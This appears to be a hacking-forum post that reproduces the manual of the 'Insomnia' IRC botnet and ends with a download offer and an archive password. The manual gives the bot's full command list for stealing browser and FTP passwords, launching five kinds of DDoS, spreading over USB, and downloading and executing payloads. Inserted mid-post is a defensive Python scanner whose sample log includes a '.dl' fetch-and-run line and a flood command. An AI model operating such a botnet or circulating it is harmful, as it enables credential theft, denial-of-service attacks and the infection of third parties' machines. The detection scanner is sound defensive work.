Insomnia Botnet 2.5 build[ masterscyber ]

Insomnia is another IRC bot sold on hacking forums, coded in .NET. I'm posting the manual here so you can see what it does.








Insomnia IRC botnet description:
INSOMNIA is coded in C# and requires the .NET 2.0 Framework to function properly. It is developed for those who want to target machines running the latest versions of Windows: XP machines with the latest updates, Vista, Windows 7, and even Windows 8. Because these later versions of Windows are bundled with the .NET Framework (3.5+), you will not need to worry about Insomnia losing functionality or having low install rates.

Core Features:
– GeoIP for country detection with system locale fallback.
– SSL support for IRC connections.
– SOCKS5 server with uPnP for a higher success rate, and authentication.
– Encrypted topic commands with generator (updating).
– Registry monitor/persistence.
– Start Up.
– Bot quit messages are specific to the reason the process is ending:
  Windows is going to sleep…
  Windows is shutting down…
  Windows is logging off…
– WMI query for installed AntiVirus and FireWall software (Vista/7/8).
– Update with MD5 hash check.
– Download and execute a .NET file in memory.
– Download and execute a file for X seconds before removing it.
– RusKill functionality marks files for deletion upon reboot and tries to reverse any changes that were made by other malware.
– 5 different DDoS methods to initiate distributed denial of service attacks against a wide variety of targets:
  Apache Remote Memory Exhaustion (A.R.M.E.)
  Slowloris
  Layer7
  Layer4
  UDP
– BotKiller that is capable of removing bots such as ngrBot and Aryan that use injected threads in explorer.exe. BotKillers on HF are hardcoded to kill only specific malware; Insomnia, on the other hand, is coded to watch for and detect many different attributes that malware display, making this easily the most effective botkiller on HF.
– FTP Stealer
– IM Stealer
– PW Stealer (Chrome and Firefox)
– Color coding to improve readability.

Command List:
.v – Displays information about the bot including current version, location of the file, MD5 hash, and registry installation location (HKCU/HKLM).
.avinfo – Vista+. Queries WMI for the current Antivirus and Firewall programs installed on the client.
.chrome [keyword] – Outputs data from Chrome SQLite databases, works on latest Chrome too (16.x).
.firefox [keyword] – Outputs password data from Mozilla Firefox (latest).
.j #channel – Joins a channel.
.p #channel – Parts a channel.
.sort – Client will join the channels that match the GeoIP/Locale of the system (ex. #US, #RU).
.unsort – Reverses the above sort.
.permsort – Admins join #admins, users join #users.
.twitter “MSG” – Starts the Twitter spread with the given message. Please make sure your message is enclosed in quotes so it knows everything to send. More params/options for this coming soon.
.ftp – Steals FTP accounts from FileZilla if installed on the target machine. Support for more coming soon.
.bk – Starts the standard botkiller module. Capable of removing most common HF malware. This function now removes any version of insomnia under v2.0.0.
.bk -i – Capable of removing bots that inject into explorer.exe on 32bit and iexplore.exe on 64bit machines.
.ruskill on/off – New global toggle for ruskill, more like a pDef/Ruskill hybrid. Activating Ruskill on download is no longer needed, just toggle this before and leave running to reverse many changes to the client system.
.rc – Tells the client to reconnect to IRC after 15 seconds have passed.
.up URL MD5 – Updates the binary with the given URL after checking it against the MD5 provided to make sure you are updating to a good file.
.dl URL – Downloads and executes the given URL.
.dl URL ENVVAR – Downloads and executes the given URL after dropping it to the path of a specific environment variable (ex. APPDATA, TEMP, etc). Case-insensitive.
.dl URL -t SECS – Downloads the target URL and waits for the given amount of time before removing the file, if it’s still running.
.dl URL -m – Downloads the target URL into memory without dropping it to disk, and uses reflection to execute it. If the app you download exits with code -1, it can sometimes kill the host process (Insomnia) as well; however, the persistence thread should restart it. This command is only for those who have a good reason to use it.
.rm – Ends persistence thread, registry monitor, ruskill, all active DDoS threads, removes registry key, and removes itself.
.m on/off – Toggles mute (when on you won’t get output from any commands).
.arme URL PORT SECS – Starts the Apache Remote Execution DDoS on the target URL.
.http URL PORT SECS – Starts the HTTP (Application Layer 7) DDoS on the target URL.
.tcp URL PORT SECS – Starts the TCP (Transport Layer 4) DDoS on the target URL.
.udp URL PORT SECS – Starts the UDP packet flood on the target URL.
.slow URL PORT SECS – Starts the Slowloris flood on the target URL.
.stop – Aborts any active DDoS threads.
.read URL – Reads encrypted topic commands from an external URL.
.socks – Starts the SOCKS5 server. If you repeat this command on systems that already have a SOCKS server running, it sets a new random password for those connections and outputs it.
.socks user pass – Sets a custom user/pass for already active/new SOCKS servers.
.usb on/off – Toggles the USB LNK automatic spreader. This will spread to all drives that are currently mounted, as well as monitor and spread to all new drives that are plugged in.
.color <on/off> – Toggles IRC color outputs.
.visit URL -h – Visits the specified URL without showing the browser.
.visit URL – Visits the specified URL in the default browser.
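The feature list and command list above define the operator vocabulary the bot obeys over IRC. As an added example from the defender's side (not code from the manual or the bot), the following Python scanner walks raw IRC PRIVMSG lines from a capture, flags any message whose first token is one of Insomnia's commands, groups it by capability, and, for the five flood commands, extracts the URL/port/duration so the victim can be notified. The sample log lines and the category grouping are constructed assumptions for the demonstration.

```python
import re
from collections import namedtuple

# Insomnia's operator commands from the list above, grouped by capability.
INSOMNIA_COMMANDS = {
    "ddos": {".arme", ".http", ".tcp", ".udp", ".slow", ".stop"},
    "stealer": {".chrome", ".firefox", ".ftp"},
    "dropper": {".dl", ".up"},
    "spreader": {".usb", ".twitter"},
    "proxy": {".socks"},
    "botkiller": {".bk", ".ruskill"},
    "control": {".v", ".avinfo", ".j", ".p", ".sort", ".unsort", ".permsort",
                ".rc", ".rm", ".m", ".read", ".color", ".visit"},
}
CATEGORY_OF = {c: cat for cat, cmds in INSOMNIA_COMMANDS.items() for c in cmds}
# Raw IRC PRIVMSG as captured on the wire: ":nick!user@host PRIVMSG #chan :text"
PRIVMSG_RE = re.compile(r"^:(?P<sender>\S+) PRIVMSG (?P<target>\S+) :(?P<text>.*)$")
# Argument shape shared by the five flood commands: URL PORT SECS
DDOS_ARGS_RE = re.compile(r"^(?P<url>\S+) (?P<port>\d{1,5}) (?P<secs>\d+)$")
Finding = namedtuple("Finding", "sender channel command category args")

def inspect_line(line):
    """Return a Finding if the IRC line carries an Insomnia command, else None."""
    m = PRIVMSG_RE.match(line.strip())
    if not m or not m["text"].startswith("."):
        return None
    cmd, _, args = m["text"].partition(" ")
    category = CATEGORY_OF.get(cmd.lower())
    if category is None:
        return None
    return Finding(m["sender"], m["target"], cmd.lower(), category, args)

def scan(lines):
    """All Insomnia command findings in a capture, in order of appearance."""
    return [f for f in map(inspect_line, lines) if f is not None]

def ddos_target(finding):
    """(url, port, seconds) of a flood command so the victim can be warned; else None."""
    if finding.category != "ddos" or finding.command == ".stop":
        return None
    m = DDOS_ARGS_RE.match(finding.args)
    return (m["url"], int(m["port"]), int(m["secs"])) if m else None

# Constructed sample capture (not real C2 traffic); RFC 5737 documentation addresses.
SAMPLE_LOG = [
    ":op!admin@203.0.113.5 PRIVMSG #US :.udp 198.51.100.7 80 120",
    ":op!admin@203.0.113.5 PRIVMSG #US :.dl http://203.0.113.9/x.exe -m",
    ":bob!u@h PRIVMSG #chat :hello, .net is fine",
    ":op!admin@203.0.113.5 PRIVMSG #US :.chrome bank",
    "PING :irc.example",
]
```

The channel name in a finding is itself a weak indicator, since `.sort` makes infected clients join country-named channels such as #US or #RU.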





Download Insomnia Botnet

Zip Extract Password :www.masterscyber.com